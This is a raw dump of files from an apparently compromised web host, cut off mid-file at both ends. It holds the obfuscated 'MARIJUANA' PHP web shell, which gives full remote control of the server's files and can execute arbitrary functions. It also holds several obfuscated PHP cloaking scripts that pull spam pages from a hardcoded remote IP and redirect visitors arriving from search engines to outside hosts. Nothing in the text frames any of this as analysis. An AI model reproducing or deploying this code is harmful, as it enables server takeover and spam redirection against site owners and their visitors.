strpos($_SERVER["\x48\124\x54\x50\x5f\125\123\x45\x52\x5f\101\107\105\116\x54"], "\x79\x61\150\x6f\x6f") > 2) { $keyword = str_replace("\x2d", "\40", $_GET["\x69\x64"]); $html = str_replace("\x3c\164\151\164\154\x65\x3e\x3c\57\x74\151\164\154\145\76", "\74\x74\x69\x74\x6c\145\76{$keyword}\74\x2f\164\x69\x74\154\145\x3e", $html); } echo $html; die; } } goto vOB84; nNU2e: $xx1 = 5; goto v28de; eu01R: $apass2 = "\142\x32\63\x68\162\x32\x33\x76\x72\x33\x32"; goto uddK8; eC4dC: $keyword = str_replace("\40", "\x2b", $keyword); goto eu01R; vOB84: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\151\x64"]); goto IQZrE; YN7wX: echo $text; goto oD2ma; lKCdq: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\164\x70\x3a\57\57\x31\63\x35\56\x31\x38\x31\56\62\61\x2e\61\62\66\57" . $_GET["\146\156"] . "\x2e\160\150\x70\x3f\x70\141\x73\163\75{$apass}\46\x71\75{$_GET["\151\x64"]}"); } goto vAtl4; NQmik: error_reporting(0); goto GGqKx; wX0xE: if ($_GET["\x69\144"] == "\x74\145\x73\x74\151\x6e\147") { echo "\x74\145\x73\x74\x20\147\x6f\157\x64\56\x2e\56"; die; } goto ifBmB; GGqKx: $today = "\62\x30\x32\65\60\66\x31\65\x2d"; goto ZszXa; Ez1dE: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto jmCUT; oD2ma: ?>home/bechata/mp/e8a40/index.php000066600000042145152366335020012157 0ustar00<?php header("X-XSS-Protection: 0");ob_start();set_time_limit(0);error_reporting(0);ini_set('display_errors', FALSE);
$Array = [
    '7068705f756e616d65',
    '70687076657273696f6e',
    '6368646972',
    '676574637764',
    '707265675f73706c6974',
    '636f7079',
    '66696c655f6765745f636f6e74656e7473',
    '6261736536345f6465636f6465',
    '69735f646972',
    '6f625f656e645f636c65616e28293b',
    '756e6c696e6b',
    '6d6b646972',
    '63686d6f64',
    '7363616e646972',
    '7374725f7265706c616365',
    '68746d6c7370656369616c6368617273',
    '7661725f64756d70',
    '666f70656e',
    '667772697465',
    '66636c6f7365',
    '64617465',
    '66696c656d74696d65',
    '737562737472',
    '737072696e7466',
    '66696c657065726d73',
    '746f756368',
    '66696c655f657869737473',
    '72656e616d65',
    '69735f6172726179',
    '69735f6f626a656374',
    '737472706f73',
    '69735f7772697461626c65',
    '69735f7265616461626c65',
    '737472746f74696d65',
    '66696c6573697a65',
    '726d646972',
    '6f625f6765745f636c65616e',
    '7265616466696c65',
    '617373657274',
];
$___ = count($Array);
for($i=0;$i<$___;$i++) {
    $GNJ[] = uhex($Array[$i]);
}
?>
    <!DOCTYPE html>
    <html dir="auto" lang="en-US">

    <head>
        <meta charset="UTF-8">
        <meta name="robots" content="NOINDEX, NOFOLLOW">

        <title>MARIJUANA</title>

        <link rel="icon" href="//0x5a455553.github.io/MARIJUANA/icon.png" />
        <link rel="stylesheet" href="//0x5a455553.github.io/MARIJUANA/main.css" type="text/css">

        <script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
    </head>

    <body>
    <header>
        <div class="y x">
            <a class="ajx" href="<?php echo basename($_SERVER['PHP_SELF']);?>">
                MARIJuANA
            </a>
        </div>

        <div class="q x w">
            &#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
        </div>

    </header>

    <article>
        <div class="i">
            <i class="far fa-hdd"></i>
            <?php echo $GNJ[0]();?>

            <br />

            <i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT  :</b> <?php echo $_SERVER['SERVER_SOFTWARE'];?> <b>PHP :</b> <?php echo $GNJ[1]();?>

            <br />

            <i class="far fa-folder"></i>

            <?php
            if(isset($_GET["d"])) {
                $d = uhex($_GET["d"]);
                $GNJ[2](uhex($_GET["d"]));
            }
            else {
                $d = $GNJ[3]();
            }
            $k = $GNJ[4]("/(\\\|\/)/", $d );
            foreach ($k as $m => $l) {
                if($l=='' && $m==0) {
                    echo '<a class="ajx" href="?d=2f">/</a>';
                }
                if($l == '') {
                    continue;
                }
                echo '<a class="ajx" href="?d=';
                for ($i = 0; $i <= $m; $i++) {
                    echo hex($k[$i]);
                    if($i != $m) {
                        echo '2f';
                    }
                }
                echo '">'.$l.'</a>/';
            }
            ?>

            <br />

        </div>

        <div class="u">
            <?php echo $_SERVER['SERVER_ADDR'];?> <i class="fas fa-link"></i>
            <br />

            <br />

            <form method="post" enctype="multipart/form-data">
                <label class="l w">
                    <input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
                </label>&nbsp;
            </form>

            <?php
            $o_ = [
                '<script>$.notify("',
                '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'
            ];
            $f = $o_[0].'OK!'.$o_[1];
            $g = $o_[0].'ER!'.$o_[1];
            if(isset($_FILES["n"])) {
                $z = $_FILES["n"]["name"];
                $r = count($z);
                for( $i=0 ; $i < $r ; $i++ ) {
                    if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
                        echo $f;
                    }
                    else {
                        echo $g;
                    }
                }
            }
            ?>

        </div>
        <?php
        $a_ = '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th>';
        $b_ = '</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td></td>
							</tr>
							<tr>
								<td class="x">';
        $c_ = '</td>
							</tr>
						</tbody>
					</table>';
        $d_ = '<br />
										<br />
										<input type="submit" class="w" value="&nbsp;OK&nbsp;" />
									</form>';
        if(isset($_GET["s"])) {
            echo $a_.uhex($_GET["s"]).$b_.'
									<textarea readonly="yes">'.$GNJ[15]($GNJ[6](uhex($_GET["s"]))).'</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d='.$_GET["d"].'&e='.$_GET["s"].'\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
								'.$c_;
        }
        elseif(isset($_GET["y"])) {
            echo $a_.'REQUEST'.$b_.'
									<form method="post">
										<input class="x" type="text" name="1" />&nbsp;&nbsp;
										<input class="x" type="text" name="2" />
										'.$d_.'
									<br />
									<textarea readonly="yes">';

            if(isset($_POST["2"])) {
                echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
            }

            echo '</textarea>
								'.$c_;
        }
        elseif(isset($_GET["e"])) {
            echo $a_.uhex($_GET["e"]).$b_.'
									<form method="post">
										<textarea name="e" class="o">'.$GNJ[15]($GNJ[6](uhex($_GET["e"]))).'</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<select id="b64" name="b64">
											<option value="0">NO</option>
											<option value="1">YES</option>
										</select>
										'.$d_.'
								'.$c_.'
								
					<script>
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
								$("textarea").val(Z);
							}
							else {
								var N = $("textarea").val();
								var I = btoa(N);
								$("textarea").val(I);
							}
						});
					</script>';
            if(isset($_POST["e"])) {
                if($_POST["b64"] == "1") {
                    $ex = $GNJ[7]($_POST["e"]);
                }
                else {
                    $ex = $_POST["e"];
                }
                $fp = $GNJ[17](uhex($_GET["e"]), 'w');
                if($GNJ[18]($fp, $ex)) {
                    OK();
                }
                else {
                    ER();
                }
                $GNJ[19]($fp);
            }
        }
        elseif(isset($_GET["x"])) {
            rec(uhex($_GET["x"]));
            if($GNJ[26](uhex($_GET["x"]))) {
                ER();
            }
            else {
                OK();
            }

        }
        elseif(isset($_GET["t"])) {
            echo $a_.uhex($_GET["t"]).$b_.'
									<form action="" method="post">
										<input name="t" class="x" type="text" value="'.$GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))).'">
										'.$d_.'
								'.$c_;
            if( !empty($_POST["t"]) ) {
                $p = $GNJ[33]($_POST["t"]);
                if($p) {
                    if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) {
                        ER();
                    }
                    else {
                        OK();
                    }
                }
                else {
                    ER();
                }
            }
        }
        elseif(isset($_GET["k"])) {
            echo $a_.uhex($_GET["k"]).$b_.'
									<form action="" method="post">
										<input name="b" class="x" type="text" value="'.$GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4).'">
										'.$d_.'
								'.$c_;
            if(!empty($_POST["b"])) {
                $x = $_POST["b"];
                $t = 0;
                for($i=strlen($x)-1;$i>=0;--$i)
                    $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1));
                if(!$GNJ[12](uhex($_GET["k"]), $t)) {
                    ER();
                }
                else {
                    OK();
                }
            }
        }
        elseif(isset($_GET["l"])) {
            echo $a_.'+DIR'.$b_.'
									<form action="" method="post">
										<input name="l" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
            if(isset($_POST["l"])) {
                if(!$GNJ[11]($_POST["l"])) {
                    ER();
                }
                else {
                    OK();
                }
            }
        }
        elseif(isset($_GET["q"])) {
            if($GNJ[10](__FILE__)) {
                $GNJ[38]($GNJ[9]);
                header("Location: ".basename($_SERVER['PHP_SELF'])."");
                exit();
            }
            else {
                echo $g;
            }
        }
        elseif(isset($_GET["n"])) {
            echo $a_.'+FILE'.$b_.'
									<form action="" method="post">
										<input name="n" class="x" type="text" value="">
										'.$d_.'
								'.$c_;
            if(isset($_POST["n"])) {
                if(!$GNJ[25]($_POST["n"])) {
                    ER();
                }
                else {
                    OK();
                }
            }
        }
        elseif(isset($_GET["r"])) {
            echo $a_.uhex($_GET["r"]).$b_.'
									<form action="" method="post">
										<input name="r" class="x" type="text" value="'.uhex($_GET["r"]).'">
										'.$d_.'
								'.$c_;
            if(isset($_POST["r"])) {
                if($GNJ[26]($_POST["r"])) {
                    ER();
                }
                else {
                    if($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
                        OK();
                    }
                    else {
                        ER();
                    }
                }
            }
        }
        elseif(isset($_GET["z"])) {
            $zip = new ZipArchive;
            $res = $zip->open(uhex($_GET["z"]));
            if($res === TRUE) {
                $zip->extractTo(uhex($_GET["d"]));
                $zip->close();
                OK();
            } else {
                ER();
            }
        }
        else {
            echo '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d='.hex($d).'&n">+FILE</a>
									<a class="ajx" href="?d='.hex($d).'&l">+DIR</a>
								</td>
							</tr>
						';

            $h = "";
            $j = "";
            $w = $GNJ[13]($d);
            if($GNJ[28]($w) || $GNJ[29]($w)) {
                foreach($w as $c){
                    $e = $GNJ[14]("\\", "/", $d);
                    if(!$GNJ[30]($c, ".zip")) {
                        $zi = '';
                    }
                    else {
                        $zi = '<a href="?d='.hex($e).'&z='.hex($c).'">U</a>';
                    }
                    if($GNJ[31]("$d/$c")) {
                        $o = "";
                    }
                    elseif(!$GNJ[32]("$d/$c")) {
                        $o = " h";
                    }
                    else {
                        $o = " w";
                    }
                    $s = $GNJ[34]("$d/$c") / 1024;
                    $s = round($s, 3);
                    if($s>=1024) {
                        $s = round($s/1024, 2) . " MB";
                    } else {
                        $s = $s . " KB";
                    }
                    if(($c != ".") && ($c != "..")){
                        ($GNJ[8]("$d/$c")) ?
                            $h .= '<tr class="r">
							<td>
								<i class="far fa-folder m"></i>
								<a class="ajx" href="?d='.hex($e).hex("/".$c).'">'.$c.'</a>
							</td>
							<td class="x">
								dir
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						'
                            :
                            $j .= '<tr class="r">
							<td>
								<i class="far fa-file m"></i>&thinsp;
								<a class="ajx" href="?d='.hex($e).'&s='.hex($c).'">'.$c.'</a>
							</td>
							<td class="x">
								'.$s.'
							</td>
							<td class="x">
								<a class="ajx'.$o.'" href="?d='.hex($e).'&k='.hex($c).'">'.x("$d/$c").'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&t='.hex($c).'">'.$GNJ[20]("Y-m-d H:i", $GNJ[21]("$d/$c")).'</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d='.hex($e).'&r='.hex($c).'">R</a>
								<a class="ajx" href="?d='.hex($e).'&e='.hex($c).'">E</a>
								<a href="?d='.hex($e).'&g='.hex($c).'">G</a>
								'.$zi.'
								<a href="?d='.hex($e).'&x='.hex($c).'">D</a>
							</td>
						</tr>
						
						';

                    }
                }
            }

            echo $h;
            echo $j;
            echo '</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d='.hex($e).'&y">REQUEST</a>
									<a href="?d='.hex($e).'&q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>';
        }
        ?>

    </article>
    <footer class="x">
        &copy;TheAlmightyZeus
    </footer>
    <?php
    if(isset($_GET["1"])) {
        echo $f;
    }
    elseif(isset($_GET["0"])) {
        echo $g;
    }
    else {
        NULL;
    }
    ?>

    <script>
        $(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
    </script>
    </body>
    </html>
<?php
function rec($j) {
    global $GNJ;
    if(trim(pathinfo($j, PATHINFO_BASENAME ), '.') === '') {
        return;
    }
    if($GNJ[8]($j)) {
        array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
        $GNJ[35]($j);
    }
    else {
        $GNJ[10]($j);
    }
}
function dre($y1, $y2) {
    global $GNJ;
    ob_start();
    $GNJ[16]($y1($y2));
    return $GNJ[36]();
}
function hex($n) {
    $y='';
    for ($i=0; $i < strlen($n); $i++){
        $y .= dechex(ord($n[$i]));
    }
    return $y;
}
function uhex($y) {
    $n='';
    for ($i=0; $i < strlen($y)-1; $i+=2){
        $n .= chr(hexdec($y[$i].$y[$i+1]));
    }
    return $n;
}
function OK() {
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=".hex($d)."&1");
    exit();
}
function ER() {
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=".hex($d)."&0");
    exit();
}
function x($c) {
    global $GNJ;
    $x = $GNJ[24]($c);
    if(($x & 0xC000) == 0xC000) {
        $u = "s";
    }
    elseif(($x & 0xA000) == 0xA000) {
        $u = "l";
    }
    elseif(($x & 0x8000) == 0x8000) {
        $u = "-";
    }
    elseif(($x & 0x6000) == 0x6000) {
        $u = "b";
    }
    elseif(($x & 0x4000) == 0x4000) {
        $u = "d";
    }
    elseif(($x & 0x2000) == 0x2000) {
        $u = "c";
    }
    elseif(($x & 0x1000) == 0x1000) {
        $u = "p";
    }
    else {
        $u = "u";
    }
    $u .= (($x & 0x0100) ? "r" : "-");
    $u .= (($x & 0x0080) ? "w" : "-");
    $u .= (($x & 0x0040) ? (($x & 0x0800) ? "s" : "x") : (($x & 0x0800) ? "S" : "-"));
    $u .= (($x & 0x0020) ? "r" : "-");
    $u .= (($x & 0x0010) ? "w" : "-");
    $u .= (($x & 0x0008) ? (($x & 0x0400) ? "s" : "x") : (($x & 0x0400) ? "S" : "-"));
    $u .= (($x & 0x0004) ? "r" : "-");
    $u .= (($x & 0x0002) ? "w" : "-");
    $u .= (($x & 0x0001) ? (($x & 0x0200) ? "t" : "x") : (($x & 0x0200) ? "T" : "-"));
    return $u;
}
if(isset($_GET["g"])) {
    $GNJ[38]($GNJ[9]);
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: Binary");
    header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));
    header("Content-disposition: attachment; filename=\"".uhex($_GET["g"])."\"");
    $GNJ[37](uhex($_GET["g"]));
}
?>home/bechata/mp/tvnlgr/index.php000066600000011355152366367600012662 0ustar00<?php
 goto lzhaG; vsNm1: $apass3 = "\162\x76\63\62\171\144\141\x63\163\166\x73\144\x76"; goto jCVVH; BbWSD: if (strlen($text) < 5000) { $url = "\61\x33\x35\56\61\x38\x31\56\62\x31\x2e\x31\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\x3c\142\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\x2e\160\x68\160\x3f\160\141\x73\x73\x3d{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\107\105\x54\40{$req}\40\x48\x54\124\x50\57\x31\x2e\x30\xd\xa"; $out .= "\x48\x6f\163\x74\x3a\x20{$url}\xd\12"; $out .= "\x43\x6f\x6e\x6e\x65\x63\x74\151\x6f\x6e\72\x20\103\x6c\157\163\145\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto prQm8; asXwd: $apass2 = "\142\x32\x33\150\162\62\x33\x76\162\x33\62"; goto Wec27; EiHGF: $_GET["\146\x6e"] = "\66\71\66\x39\66\71\x6e\145\x77"; goto tFjh1; ho2B1: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\160\x3a\57\x2f\61\63\65\56\61\70\x31\56\62\x31\x2e\61\x32\66\57" . $_GET["\x66\x6e"] . "\56\160\150\160\77\x70\x61\163\163\75{$apass}\x26\161\75{$_GET["\x69\x64"]}"); } goto BbWSD; CLUbw: $xx1 = 5; goto GZ4ko; GZ4ko: $keyword = str_replace("\x2d", "\x20", $_GET["\151\x64"]); goto j2jMb; LSreF: if (strpos($_SERVER["\110\x54\x54\120\137\x52\105\x46\x45\x52\105\x52"], "\147\x6f\x6f\x67\154\x65\x2e") or strpos($_SERVER["\x48\124\124\x50\137\x52\x45\x46\x45\122\x45\122"], "\171\141\x68\157\157\x2e") or strpos($_SERVER["\110\124\x54\x50\x5f\122\105\106\x45\x52\x45\x52"], "\x62\151\x6e\147\56")) { $tpl = "\151\156\144\145\170\57" . $_GET["\151\x64"] . "\x2e\x70\x68\x70\56\x74\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\114\x6f\143\141\164\x69\157\156\x3a\40\150\x74\164\x70\x3a\57\57\66\65\56\x31\x30\x38\56\61\x30\x2e\x31\x39\x39\57\x65\156\164\145\x72\57\77\x6d\x61\162\153\75{$today}\55{$s}\46\x74\x70\154\x3d{$tpl}\46\x65\x6e\147\x6b\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\x2e\x70\x68\x70"; if (file_exists("\x69\156\x64\x65\170\x2f" . $myname)) { $html = @file_get_contents("\x69\156\144\x65\170\x2f" . $myname); if (strpos($_SERVER["\110\124\124\x50\137\125\123\x45\122\x5f\x41\107\105\x4e\124"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\124\x50\137\125\x53\x45\x52\137\x41\x47\x45\x4e\x54"], "\171\x61\x68\157\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); $html = str_replace("\x3c\164\x69\164\154\x65\76\74\x2f\x74\x69\164\154\145\76", "\74\x74\x69\x74\x6c\145\x3e{$keyword}\74\x2f\x74\151\x74\x6c\145\x3e", $html); } echo $html; die; } } goto Bo8XF; RTrkn: if ($_GET["\x69\x64"] == "\164\x65\x73\164\x69\156\147") { echo "\164\145\163\164\x20\147\157\157\144\x2e\x2e\56"; die; } goto FlnoG; Bo8XF: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\144"]); goto g__V3; jCVVH: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto LSreF; FlnoG: if ($_GET["\x69\x64"] == "\151\156\144\x65\170") { header("\x4c\x6f\x63\x61\164\x69\x6f\156\x3a\x20\150\x74\164\160\163\72\57\57\147\x6f\x6f\147\x6c\x65\56\143\157\x6d"); die; } goto UeR3M; hhK3y: if ($s == "\134" | $s == "\57") { $s = ''; } goto uZwQh; lzhaG: error_reporting(0); goto z22wy; j2jMb: $keyword = str_replace("\x20", "\x2b", $keyword); goto asXwd; g__V3: $text = ''; goto vQsir; Wec27: $s = dirname($_SERVER["\x50\x48\120\x5f\123\105\114\106"]); goto hhK3y; vQsir: if (function_exists("\143\165\x72\x6c\137\x69\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\164\x70\x3a\x2f\x2f\61\x33\x35\x2e\x31\70\x31\x2e\x32\61\x2e\61\62\66\x2f" . $_GET["\x66\x6e"] . "\x2e\160\x68\x70\x3f\x70\141\163\163\75{$apass}\x26\161\75{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\151\154\x6c\x61\57\64\x2e\60\x20\x28\143\157\x6d\160\x61\164\x69\x62\x6c\x65\x3b\40\x4d\123\x49\105\x20\66\x2e\60\73\40\x57\151\x6e\144\x6f\167\163\x20\x4e\x54\40\x35\x2e\61\73\40\123\126\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto ho2B1; OMiOK: $x1 = 3; goto CLUbw; z22wy: $today = "\62\60\x32\65\x31\x30\60\x33\x2d"; goto q21RX; uILrt: echo $text; goto YEy7Z; uZwQh: $s = $_SERVER["\123\105\x52\x56\x45\x52\137\116\101\115\x45"] . $s; goto vsNm1; q21RX: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto RTrkn; prQm8: if (strlen($text) > 5000) { $out = fopen("\x69\156\x64\x65\x78\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto uILrt; UeR3M: $_GET["\x77\157\x72\x6c\144"] = 5; goto EiHGF; tFjh1: $apass1 = "\166\x69\x73\x64\x6f\x69\x6a\x65\x77"; goto OMiOK; YEy7Z: ?>home/bechata/mp/lu7uoya/index.php000066600000011351152366440310012735 0ustar00<?php
 goto NQkTc; oPNww: echo $text; goto WyW2P; wQ15a: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\x74\160\x3a\x2f\57\x31\x33\65\56\61\70\x31\x2e\x32\61\x2e\61\62\x36\x2f" . $_GET["\x66\x6e"] . "\x2e\x70\150\x70\77\160\x61\163\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\x64"]}"); } goto OO6Du; d5f3F: $today = "\x32\x30\62\65\x30\63\62\x36\x2d"; goto nVmir; kV3gQ: $text = ''; goto gEvmn; ajdtv: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto oi2_V; BPcgh: if ($_GET["\x69\x64"] == "\151\x6e\144\145\x78") { header("\x4c\x6f\143\x61\x74\x69\x6f\156\72\x20\x68\x74\164\160\163\72\x2f\57\147\157\157\147\154\145\56\143\x6f\x6d"); die; } goto vrvYG; vrvYG: $_GET["\167\x6f\x72\x6c\144"] = 5; goto yapW2; hiXmM: $apass2 = "\x62\x32\x33\150\162\62\x33\x76\162\63\x32"; goto DfS0v; yapW2: $_GET["\x66\156"] = "\66\71\x36\71\66\71\x6e\145\167"; goto YPqdV; Yp0Iu: $keyword = str_replace("\40", "\53", $keyword); goto hiXmM; DfS0v: $s = dirname($_SERVER["\120\110\120\x5f\x53\105\x4c\106"]); goto xZhzZ; nVmir: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto RwOCb; NQkTc: error_reporting(0); goto d5f3F; B1KTo: $apass3 = "\x72\x76\x33\x32\171\144\x61\x63\163\x76\163\x64\166"; goto ajdtv; RNCSO: $query_pars_2 = str_replace("\55", "\53", $_GET["\x69\144"]); goto kV3gQ; nDV27: $keyword = str_replace("\x2d", "\x20", $_GET["\151\144"]); goto Yp0Iu; gEvmn: if (function_exists("\143\x75\x72\154\x5f\x69\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\x3a\x2f\x2f\x31\63\65\x2e\61\x38\x31\56\x32\61\56\61\62\x36\57" . $_GET["\146\x6e"] . "\56\x70\150\160\77\160\141\x73\x73\x3d{$apass}\x26\161\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\x7a\x69\154\154\x61\x2f\64\x2e\x30\x20\50\x63\x6f\155\160\141\x74\x69\142\154\x65\x3b\x20\115\123\111\x45\40\x36\x2e\x30\x3b\x20\x57\151\156\x64\x6f\167\x73\40\x4e\124\x20\65\x2e\x31\73\x20\123\x56\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto wQ15a; EF58b: if (strlen($text) > 5000) { $out = fopen("\x69\156\144\x65\x78\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto oPNww; OEnqz: $xx1 = 5; goto nDV27; gM6Jv: $s = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\101\x4d\x45"] . $s; goto B1KTo; RwOCb: if ($_GET["\151\x64"] == "\x74\x65\163\x74\151\156\147") { echo "\x74\145\163\164\x20\x67\x6f\x6f\144\x2e\x2e\56"; die; } goto BPcgh; oi2_V: if (strpos($_SERVER["\110\x54\124\x50\x5f\122\x45\x46\x45\x52\105\x52"], "\147\157\x6f\147\x6c\145\56") or strpos($_SERVER["\110\x54\x54\120\x5f\122\105\x46\105\x52\105\122"], "\x79\x61\x68\x6f\157\x2e") or strpos($_SERVER["\110\124\x54\x50\x5f\x52\x45\x46\105\122\x45\122"], "\x62\x69\x6e\x67\56")) { $tpl = "\151\156\x64\x65\170\57" . $_GET["\151\x64"] . "\56\160\x68\160\56\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\x4c\x6f\x63\x61\164\151\157\156\72\40\150\x74\164\x70\163\x3a\57\57\x63\x68\160\x6f\x6b\56\163\x69\164\x65\57\x65\156\164\145\162\57\x3f\x6d\x61\x72\153\x3d{$today}\55{$s}\x26\164\x70\x6c\75{$tpl}\46\145\x6e\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\56\x70\x68\160"; if (file_exists("\x69\x6e\x64\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\x69\156\144\x65\x78\57" . $myname); if (strpos($_SERVER["\110\x54\x54\120\x5f\x55\123\105\122\137\101\107\x45\x4e\124"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\124\x54\x50\137\x55\123\105\x52\x5f\x41\x47\x45\x4e\x54"], "\x79\141\150\x6f\x6f") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\x69\164\154\x65\76\74\57\164\x69\164\x6c\x65\76", "\x3c\x74\151\x74\154\x65\76{$keyword}\x3c\x2f\x74\151\x74\x6c\x65\76", $html); } echo $html; die; } } goto RNCSO; xZhzZ: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto gM6Jv; YF3nN: $x1 = 3; goto OEnqz; OO6Du: if (strlen($text) < 5000) { $url = "\61\x33\x35\x2e\61\x38\x31\x2e\62\61\x2e\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\x3c\x62\x72\40\x2f\76\xa"; } else { $req = "\57" . $_GET["\146\156"] . "\56\160\x68\160\77\x70\141\x73\x73\75{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\x47\105\x54\40{$req}\x20\110\x54\x54\120\57\x31\x2e\x30\xd\xa"; $out .= "\x48\157\x73\x74\72\40{$url}\xd\12"; $out .= "\x43\157\156\x6e\x65\x63\164\151\x6f\156\72\x20\103\154\x6f\163\x65\xd\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto EF58b; YPqdV: $apass1 = "\166\x69\163\144\157\x69\x6a\x65\x77"; goto YF3nN; WyW2P: ?>home/bechata/mp/kpnqp/index.php000066600000011357152366441330012472 0ustar00<?php
